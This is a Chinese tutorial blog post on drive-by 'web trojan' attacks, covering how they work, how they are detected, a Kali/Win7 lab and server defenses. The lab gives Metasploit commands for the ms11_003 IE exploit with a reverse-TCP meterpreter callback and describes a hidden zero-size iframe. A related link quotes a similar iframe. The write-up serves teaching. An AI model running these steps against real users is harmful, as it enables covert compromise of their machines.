php pwuj 挂马,网站挂马原理及实战
注:本文仅供学习参考
网页挂马简介
网页挂马指的是把一个木马程序上传到一个网站里面,然后用木马生成器生成一个网马,放到网页空间里面,再加代码使得木马在打开网页时运行。
网页挂马工作原理
作为网页挂马的散布者,其目的是将木马下载到用户本地并进一步执行,当木马得到执行后,就意味着会有更多的木马被下载,且进一步被执行。这样就进入一个恶性的循环,从而使用户的电脑遭到攻击和控制。为达到目的首先要将木马下载到本地。
常见方式
1将木马伪装为页面元素,木马则会被浏览器自动下载到本地。
2利用脚本运行的漏洞下载木马。
3利用脚本运行的漏洞释放隐含在网页脚本中的木马。
4将木马伪装成缺失的组件,或和缺失的组件捆绑在一起,如flash播放插件。这样既达到了下载的目的,下载的组件又会被浏览器自动执行。
5通过脚本运行调用某些com组件,利用其漏洞下载木马。
6在渲染页面内容的过程中,利用格式溢出释放木马,如ani格式溢出漏洞。
7在渲染页面内容的过程中,利用格式溢出下载木马,如flash9.0.115播放漏洞。
检测方式
1特征匹配:将网页挂马的脚本按脚本病毒进行检测,但是网页脚本变形方式、加密方式比起传统的PE格式病毒更为多样,检测起来也更加困难。
2主动防御:当浏览器要进行某些动作时,作出提示,如下载了某插件的安装包,会提示是否运行。比如浏览器创建暴风影音播放器时,提示是否允许运行,大多数情况下用户会点击是,网页木马会因此得到执行。
3检查父进程是否为浏览器,这种方法很容易被躲过且会对很多插件造成误报。
网站挂马实验
准备win7实验机和kali
kali ip地址为10.1.1.101
1.将以下代码插进我们准备的网站中
将宽度高度都设为0,这个地址就会变成透明,不查看源代码的话是发现不了的
这里的网马地址设置为http://10.1.1.101:8060/test.html当用户访问到我们这个地址时,会自动访问http://10.1.1.101:8060/test.html,木马会被浏览下载到本地
2.利用ms11_003IE漏洞攻击win7主机
执行命令
use exploit/windows/browser/ ms11_003_ie_css_import’,选择漏洞利用EXP
设置SRVPORT URIPATH与网马中的src一致
set SRVPORT 8060
set URIPATH test.html
运行命令set payload windows/meterpreter/reverse_tcp 设置攻击载荷进行回连
set lhost 10.1.1.101 设置回连的IP地址
set lport 1234设置回连端口号
show options
最后设置完看下图
执行run命令
好戏上场
这时打开win7实验机,打开IE,模拟受害者访问http://10.1.1.101/index.html
在kali端成功看到受害者主机上线
成功使用sysinfo查看主机信息
使用Screenshot查看win7实验机的屏幕截图(win7待机了)
包括后面收集信息属于后渗透环节,本文不做讨论。
防御措施
1对开放上传附件功能的网站,一定要进行身份认证,并只允许信任的人使用上传程序。
2保证所使用的程序及时地更新。
3不要在前台网页加注后台管理程序登录页面的链接。
4时常备份数据库等文件,但是不要把备份数据放在程序默认的备份目录下。
5管理员的用户名和密码要有一定复杂性。
6 IIS中禁止目录的写入和执行功能,可以有效防止asp木马。
7在服务器、虚拟主机控制面板设置执行权限选项中,将有上传权限的目录取消asp的运行权限。
8创建一个robots.txt上传到网站根目录,Robots能够有效防范利用搜索引擎窃取信息的骇客。
php pwuj 挂马,网站挂马原理及实战相关推荐
- 各种网站挂马的代码和原理
只要不破坏原有的语言逻辑,那就想插入哪里就写哪里了,最基本的语句当然是<iframe src=http://www.fucksb.net/mm.htm width=0 height=0>& ...
- qqsafe病毒 arp网站挂马 原理剖析-786ts.qqsafe-qqservicesyydswfhuw8ysjftwf.org(转载)
昨天小站被挂马了,每次打开都会自动弹出一个对话框,提示正准备安装...,然后就消失.查看页面的源文件会发现在代码的最后面被加上了9 ~0 ]* U9 N2 ^ <body>" z ...
- 专家:端午将至湖北地区挂马网站激增 用户需警惕
据瑞星"云安全"系统监测,5月22日至24日,"湖北省麻城市第二实验小学"."湖北师范学院教务处"."湖北省团风县工商局红盾信息网 ...
- 全国知名高校网站挂马现象严重 考生面临安全风险
据瑞星"云安全"系统监测,6月18日,"湖北工业大学"."哈尔滨理工大学"."武汉理工大学"等全国知名理工类高校网站被黑 ...
- 瑞星:周末拦截挂马网站数减少 新闻类网站占主打
据瑞星"云安全"系统监测,5月15日至17日,"四川新闻网-国内频道"."浙江在线新闻网站"."中华英才网"等网站被黑客 ...
- 金山安全报告:二月漏洞频出 网站挂马猖獗
赚足眼球的"猫癣" 一款早在春节之前就已经发出预警的病毒,在大假结束后还是席卷了国内网络,无论称呼"猫癣"还是"犇牛",被电脑用户们牢牢记住 ...
- 三月提示:提防挂马网站 关注账号安全
根据2月所观察与收集到的数据,金山毒霸反病毒工程师对3月份的安全形式做出以下估计与提示: 提防微软高危漏洞MS09-002通过网站挂马传播 根据金山毒霸反病毒工程师们的监测,病毒团伙已经开始从各被挂马 ...
- 《越狱》完结 米帅迷应小心纹身网站挂马
据瑞星"云安全"系统监测,5月18日是世界博物馆日,"中国书画苑"."今日艺术网"."中国艺术品在线"等网站被黑客挂马, ...
- 网站挂马危害及其防御措施
网页挂马是攻击者通过在正常的页面中(通常是网站的主页)插入一段代码.浏览者在打开该页面的时候,这段代码被执行,然后下载并运行某木马的服务器端程序,进而控制浏览者的主机.通俗点说就是将网页木马这样的攻击 ...
- 2010.1.26网站挂马播报
今天共监测到9个网站被挂马,149个挂马链接,为了防止误点击,把地址稍微做了处理. 以下为挂马网站: h11p://www.cdldbz.gov.cn h11p://www.cfl.cqu.edu.c ...
最新文章
- tomcat拒绝访问是为什么_Tomcat中的connectTimeout和慢攻击
- Win10+VS2015+EF6.0+MySQL5.6+MVC环境部署和排错
- Google Guice范例解说之使用入门
- 英语口语 Week15 TuesDay
- 响应设置cookie_注册登录 与 Cookie
- 页面的访问速度如何提高?(我所知道的,哪位高手有其它的高见,敬请提醒....)...
- kafka 消费者组 消费者订阅不同主题_深入了解kafka系列-消费者
- 【翻译】YARN Architecture
- h5小游戏构建架设h5棋牌平台开发制作
- ussd代码大全_USSD查询器app
- OpenHarmony学习笔记——编辑器访问Linux服务器进行编译
- 苹果计算机磁盘格式,Mac怎么将ntfs格式的磁盘格式化
- Unity 3D 动画系统(Mecanim)|| Unity 3D 人形角色动画(Avatar)
- 如图GX Works2所示我该如何操作?
- python的matplotlib绘图(双坐标轴)
- 分析股票怎么进行量化交易?
- docker 改host_Docker容器修改端口映射
- DirectShow入门
- 12 DB操作 Hibernate Panache
- 暴风影音官网、App 挂了​!老板被捕,高管全辞职,员工:以后工作向谁汇报?...